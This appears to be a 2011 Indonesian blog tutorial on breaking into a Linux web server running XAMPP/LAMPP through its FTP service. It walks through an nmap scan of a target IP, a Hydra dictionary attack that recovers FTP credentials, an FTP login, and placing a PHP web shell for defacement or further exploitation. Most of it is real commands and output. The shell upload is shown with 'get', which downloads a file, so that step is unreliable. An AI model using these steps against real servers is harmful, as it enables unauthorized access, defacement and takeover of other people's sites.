Rabu, 09 November 2011

Hacking hosting linux yang menggunakan XAMPP / LAMPP selain lewat phpmyadmin


Hacking suatu web kadang kita tidak harus melakukan hacking selalu diawali dengan menyerang webnya, hacking password phpmyadmin sudah ada di artikel yang penulis tulis sebelumnya dimana dapat juga untuk hacking XAMPP / LAMPP di linux yang mengakses databasenya dapat memanfaatkan phpmyadmin. Jika misalkan password phpmyadmin tersebut tetap saja tidak tembus apakah masih ada kemungkinan lewat cara lain? ada, contohnya kita dapat melakukan serangan ke FTP untuk mendapatkan username dan passwordnya, web server dapat digunakan sebagai alat mengeksekusi saja, seperti yang sudah diketahui FTP Server di linux sudah masuk dalam XAMPP / LAMPP itu sendiri yang akan otomatis jalan jika kita jalankan XAMPP / LAMPP-nya, disini penulis contohkan teknik hacking dengan memanfaatkan FTP dengan dengan dictionary attack.


Pertama-tama kita coba periksa port-port di komputer target yang terbuka sekaligus OS yang digunakan.
C:\Users\Public>nmap -A 180.254.98.65
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 06:14 SE Asia Standard Time
Nmap scan report for vps-semarang.com (180.254.98.65)
Host is up (0.0034s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.1
80/tcp   open  http     Apache httpd 2.2.9 ((Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0
.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_html-title: Site doesn’t have a title (text/html).
|_http-favicon:
443/tcp  open  ssl/http Apache httpd 2.2.9 ((Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0
.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_sslv2: server still supports SSLv2
|_html-title: Site doesn’t have a title (text/html).
|_http-favicon:
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:31:78:A4 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.17 – 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.75 seconds
C:\Users\Public>
Dari scanning dengan NMAP ternyata port 21 terbuka selain port 80 yang merupakan service http untuk web server Apache. Sesuai topik kita akan mencoba melakukan hacking dari sisi FTP Servernya menggunakan hydra.
C:\Users\Public\hydra\hydra>hydra -m / -L username.txt -P password.txt 180.254.98.65 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 06:11:39
[DATA] 16 tasks, 1 servers, 96 login tries (l:6/p:16), ~6 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 180.254.98.65   login: linux   password: ubuntu
[STATUS] attack finished for 180.254.98.65 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 06:12:11
C:\Users\Public\hydra\hydra>
Binggo, ternyata username dan password didapat, oke langsung login saja setelah mendapatkan akses FTP Server.
C:\Users\Public\hydra\hydra>ftp 180.254.98.65
Connected to 180.254.98.65.
220 ProFTPD 1.3.1 Server (ProFTPD) [180.254.98.65]
User (180.254.98.65:(none)): linux
331 Password required for linux
Password:
230 User linux logged in
ftp>
Dengan sudah login FTP maka anda dimungkinkan dapat melakukan deface di web target, tapi jika ingin exploitasi lebih jauh tidak sekedar deface maka dapat melakukan upload shell php, perintahnya.
ftp> get shellxx.php
200 PORT command successful
150 Opening ASCII mode data connection for shellxx.php (105630 bytes)
226 Transfer complete
ftp: 105630 bytes received in 0,03Seconds 4062,69Kbytes/sec.
ftp>
Oke dengan http://180.254.98.65/shellxx.php anda tentu tahu apa yang terjadi. ^_^

0 komentar:

Posting Komentar

 

in4matica Generasi Biru Template by Ipietoon Cute Blog Design